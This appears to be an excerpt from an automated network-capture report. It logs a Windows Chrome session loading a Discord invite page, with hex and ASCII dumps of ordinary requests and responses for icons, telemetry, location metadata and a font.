                                                                          2023-12-10 16:45:25 UTC250INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 20 31 32 22 20 77 69 64 74 68 3d 22 31 33 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 35 2e 33 39 30 31 31 2e 35 34 30 30 32 37 63 2e 33 35 35 33 36 2d 2e 37 32 30 30 33 37 20 31 2e 33 38 32 31 31 2d 2e 37 32 30 30 33 36 20 31 2e 37 33 37 34 37 2e 30 30 30 30 30 32 6c 31 2e 31 38 33 35 39 20 32 2e 33 39 38 32 30 31 63 2e 31 34 31 31 31 2e 32 38 35 39 33 2e 34 31 33 38 38 2e 34 38 34 31 31 2e 37 32 39 34 32 2e 35 32 39 39 36 6c 32 2e 36 34 36 36 31 2e 33 38 34 35 37 63 2e 37 39 34 36 2e 31 31 35 34 36 20 31 2e 31 31
                                                                          Data Ascii: <svg fill="none" height="12" viewBox="0 0 13 12" width="13" xmlns="http://www.w3.org/2000/svg"><path d="m5.39011.540027c.35536-.720037 1.38211-.720036 1.73747.000002l1.18359 2.398201c.14111.28593.41388.48411.72942.52996l2.64661.38457c.7946.11546 1.11
                                                                          2023-12-10 16:45:25 UTC438INData Raw: 31 39 20 31 2e 30 39 31 39 36 2e 35 33 36 39 20 31 2e 36 35 32 34 33 6c 2d 31 2e 39 31 35 31 20 31 2e 38 36 36 37 34 63 2d 2e 32 32 38 33 2e 32 32 32 35 37 2d 2e 33 33 32 35 32 2e 35 34 33 32 33 2d 2e 32 37 38 36 2e 38 35 37 35 6c 2e 34 35 32 31 20 32 2e 36 33 35 38 37 63 2e 31 33 35 37 2e 37 39 31 34 2d 2e 36 39 34 39 36 20 31 2e 33 39 34 39 2d 31 2e 34 30 35 36 37 20 31 2e 30 32 31 33 6c 2d 32 2e 33 36 37 31 37 2d 31 2e 32 34 34 35 63 2d 2e 32 38 32 32 33 2d 2e 31 34 38 34 2d 2e 36 31 39 34 2d 2e 31 34 38 34 2d 2e 39 30 31 36 32 20 30 6c 2d 32 2e 33 36 37 31 37 20 31 2e 32 34 34 35 63 2d 2e 37 31 30 37 32 2e 33 37 33 36 2d 31 2e 35 34 31 33 38 2d 2e 32 32 39 39 2d 31 2e 34 30 35 36 35 2d 31 2e 30 32 31 33 6c 2e 34 35 32 30 39 2d 32 2e 36 33 35 38 37 63
                                                                          Data Ascii: 19 1.09196.5369 1.65243l-1.9151 1.86674c-.2283.22257-.33252.54323-.2786.8575l.4521 2.63587c.1357.7914-.69496 1.3949-1.40567 1.0213l-2.36717-1.2445c-.28223-.1484-.6194-.1484-.90162 0l-2.36717 1.2445c-.71072.3736-1.54138-.2299-1.40565-1.0213l.45209-2.63587c


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          374192.168.2.550111162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC1036OUTGET /assets/8f581f91e7e650ac87a2.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=vy2SOoFIazLkclN_hzdgnccOM4x55DI6.XQfVv9iLQw-1702226724746-0-604800000
                                                                          2023-12-10 16:45:25 UTC966INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 39 39 62 36 39 36 37 62 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:25 GMTContent-Type: image/svg+xmlContent-Length: 137Connection: closeCF-Ray: 8336f5499b6967b1-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Co
                                                                          2023-12-10 16:45:25 UTC137INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 39 20 38 22 20 77 69 64 74 68 3d 22 39 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 34 2e 35 20 30 20 34 2e 35 20 38 68 2d 39 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                          Data Ascii: <svg fill="none" height="8" viewBox="0 0 9 8" width="9" xmlns="http://www.w3.org/2000/svg"><path d="m4.5 0 4.5 8h-9z" fill="#fff"/></svg>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          375192.168.2.550112162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC1790OUTPOST /api/v9/science HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 1116
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          Content-Type: application/json
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://discord.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=9Vr07dmk9BjeMAFxkOqVE2D8M2Cr8A_AMnLsBCJOnx4-1702226725134-0-604800000
                                                                          2023-12-10 16:45:25 UTC1116OUTData Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 69 6e 76 69 74 65 5f 6f 70 65 6e 65 64 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 63 6c 69 65 6e 74 5f 74 72 61 63 6b 5f 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 32 32 32 36 37 32 33 33 34 31 2c 22 69 6e 76 69 74 65 5f 63 6f 64 65 22 3a 22 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 22 2c 22 63 6c 69 65 6e 74 5f 70 65 72 66 6f 72 6d 61 6e 63 65 5f 6d 65 6d 6f 72 79 22 3a 30 2c 22 61 63 63 65 73 73 69 62 69 6c 69 74 79 5f 66 65 61 74 75 72 65 73 22 3a 31 32 38 2c 22 72 65 6e 64 65 72 65 64 5f 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 2c 22 75 70 74 69 6d 65 5f 61 70 70 22 3a 31 38 2c 22 63 6c 69 65 6e 74 5f 72 74 63 5f 73 74 61 74 65 22 3a 22 44 49 53 43 4f 4e 4e 45 43 54 45 44 22 2c 22
                                                                          Data Ascii: {"events":[{"type":"invite_opened","properties":{"client_track_timestamp":1702226723341,"invite_code":"boringsecurity","client_performance_memory":0,"accessibility_features":128,"rendered_locale":"en-US","uptime_app":18,"client_rtc_state":"DISCONNECTED","
                                                                          2023-12-10 16:45:25 UTC976INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 4f 72 69 67 69 6e 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a
                                                                          Data Ascii: HTTP/1.1 204 No ContentDate: Sun, 10 Dec 2023 16:45:25 GMTConnection: closevary: Origin, Access-Control-Request-Method, Access-Control-Request-Headersaccess-control-allow-origin: https://discord.comVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          376192.168.2.550113162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC1036OUTGET /assets/44d5e1639bc492dc8d62.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=vy2SOoFIazLkclN_hzdgnccOM4x55DI6.XQfVv9iLQw-1702226724746-0-604800000
                                                                          2023-12-10 16:45:25 UTC1116INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 34 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 61 65 38 31 39 37 34 37 66 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:25 GMTContent-Type: image/svg+xmlContent-Length: 3146Connection: closeCF-Ray: 8336f54ae819747f-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-C
                                                                          2023-12-10 16:45:25 UTC253INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 39 30 20 35 39 2e 31 39 22 3e 0a 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2e 63 6c 73 2d 31 7b 66 69 6c 6c 3a 23 36 61 39 34 66 66 7d 2e 63 6c 73 2d 32 7b 66 69 6c 6c 3a 23 61 39 63 37 66 66 7d 2e 63 6c 73 2d 33 7b 66 69 6c 6c 3a 23 32 30 32 32 32 35 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 64 65 66 73 3e 0a 20 20 3c 67 20 69 64 3d 22 e5 9b be e5 b1 82 5f 32 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 e5 9b be e5 b1 82 20 32 22 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20
                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 90 59.19"> <defs> <style> .cls-1{fill:#6a94ff}.cls-2{fill:#a9c7ff}.cls-3{fill:#202225} </style> </defs> <g id="_2" data-name=" 2"> <g id="Layer_1" data-name="Layer
                                                                          2023-12-10 16:45:25 UTC1369INData Raw: 31 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 38 39 2e 35 39 20 31 39 2e 38 39 20 38 34 2e 39 33 20 38 2e 33 38 61 35 2e 35 31 20 35 2e 35 31 20 30 20 30 20 30 2d 37 2e 31 39 2d 33 6c 2d 35 2e 36 37 20 32 2e 32 35 41 31 32 2e 34 32 20 31 32 2e 34 32 20 30 20 30 20 30 20 35 36 20 2e 39 31 4c 34 35 2e 34 38 20 35 2e 31 36 63 2d 31 2e 38 34 20 34 2e 31 31 2d 35 2e 34 38 20 39 2e 37 32 2d 31 31 2e 35 39 20 39 2e 35 32 61 38 2e 35 35 20 38 2e 35 35 20 30 20 30 20 31 2d 35 2e 35 31 2d 32 2e 31 33 63 2d 2e 31 32 2d 2e 31 31 2d 2e 32 34 2d 2e 32 32 2d 2e 33 34 2d 2e 33 33 6c 2d 31 32 2e 36 36 20 35 2e 31 33 61 31 32 2e 34 32 20 31 32 2e 34 32 20 30 20 30 20 30 2d 36 2e 39 20 31 36 6c 2d 35 20 32 41 35 2e 35
                                                                          Data Ascii: 1"> <path class="cls-1" d="M89.59 19.89 84.93 8.38a5.51 5.51 0 0 0-7.19-3l-5.67 2.25A12.42 12.42 0 0 0 56 .91L45.48 5.16c-1.84 4.11-5.48 9.72-11.59 9.52a8.55 8.55 0 0 1-5.51-2.13c-.12-.11-.24-.22-.34-.33l-12.66 5.13a12.42 12.42 0 0 0-6.9 16l-5 2A5.5
                                                                          2023-12-10 16:45:25 UTC1369INData Raw: 30 20 31 20 38 34 20 32 33 2e 36 33 5a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 32 32 2e 33 33 20 33 39 2e 36 61 33 2e 37 32 20 33 2e 37 32 20 30 20 31 20 31 20 32 2e 30 36 2d 34 2e 38 35 20 33 2e 37 31 20 33 2e 37 31 20 30 20 30 20 31 2d 32 2e 30 36 20 34 2e 38 35 5a 4d 34 35 2e 34 38 20 35 2e 31 36 63 2d 31 2e 38 34 20 34 2e 31 31 2d 35 2e 34 38 20 39 2e 37 32 2d 31 31 2e 35 39 20 39 2e 35 32 61 38 2e 35 35 20 38 2e 35 35 20 30 20 30 20 31 2d 35 2e 35 31 2d 32 2e 31 33 63 2d 2e 31 32 2d 2e 31 31 2d 2e 32 34 2d 2e 32 32 2d 2e 33 34 2d 2e 33 33 5a 4d 35 35 2e 36 39 20 33 38 2e 30 35 6c 2d 31 31 2e 37 37 20 34 2e 37 37 41 31 30 2e 36 31 20 31 30 2e 36 31 20 30 20 30 20 31 20 33 30 2e 31 31 20 33
                                                                          Data Ascii: 0 1 84 23.63Z"/> <path class="cls-1" d="M22.33 39.6a3.72 3.72 0 1 1 2.06-4.85 3.71 3.71 0 0 1-2.06 4.85ZM45.48 5.16c-1.84 4.11-5.48 9.72-11.59 9.52a8.55 8.55 0 0 1-5.51-2.13c-.12-.11-.24-.22-.34-.33ZM55.69 38.05l-11.77 4.77A10.61 10.61 0 0 1 30.11 3
                                                                          2023-12-10 16:45:25 UTC155INData Raw: 2e 37 33 20 30 20 30 20 31 2d 2e 31 38 2d 31 20 2e 37 34 2e 37 34 20 30 20 30 20 31 20 31 2d 2e 31 39 20 31 34 2e 35 38 20 31 34 2e 35 38 20 30 20 30 20 30 20 31 34 2e 31 32 20 31 2e 35 38 2e 37 34 2e 37 34 20 30 20 30 20 31 20 2e 35 38 20 31 2e 33 37 20 31 36 2e 31 39 20 31 36 2e 31 39 20 30 20 30 20 31 2d 36 2e 32 35 20 31 2e 32 34 5a 22 20 66 69 6c 6c 3d 22 23 32 39 63 61 37 61 22 2f 3e 0a 20 20 20 20 3c 2f 67 3e 0a 20 20 3c 2f 67 3e 0a 3c 2f 73 76 67 3e 0a
                                                                          Data Ascii: .73 0 0 1-.18-1 .74.74 0 0 1 1-.19 14.58 14.58 0 0 0 14.12 1.58.74.74 0 0 1 .58 1.37 16.19 16.19 0 0 1-6.25 1.24Z" fill="#29ca7a"/> </g> </g></svg>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          377192.168.2.550114162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC1721OUTGET /api/v9/auth/location-metadata HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=9Vr07dmk9BjeMAFxkOqVE2D8M2Cr8A_AMnLsBCJOnx4-1702226725134-0-604800000
                                                                          2023-12-10 16:45:25 UTC926INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 3b 20 70 72 65 6c 6f 61 64 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:25 GMTContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closestrict-transport-security: max-age=31536000; includeSubDomains; preloadvary: Accept-Encodingvia: 1.1 googleAlt-Svc:
                                                                          2023-12-10 16:45:25 UTC119INData Raw: 37 31 0d 0a 7b 22 63 6f 6e 73 65 6e 74 5f 72 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 70 72 6f 6d 6f 74 69 6f 6e 61 6c 5f 65 6d 61 69 6c 5f 6f 70 74 5f 69 6e 22 3a 7b 22 72 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 2c 22 70 72 65 5f 63 68 65 63 6b 65 64 22 3a 66 61 6c 73 65 7d 7d 0a 0d 0a
                                                                          Data Ascii: 71{"consent_required":false,"country_code":"US","promotional_email_opt_in":{"required":false,"pre_checked":false}}
                                                                          2023-12-10 16:45:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          378192.168.2.550115162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC1016OUTGET /assets/20ac37ed2576dd48d7dc.woff2 HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://discord.com
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: font
                                                                          Referer: https://discord.com/assets/app.83f01b3df65cd0fa3bb9.css
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=9Vr07dmk9BjeMAFxkOqVE2D8M2Cr8A_AMnLsBCJOnx4-1702226725134-0-604800000
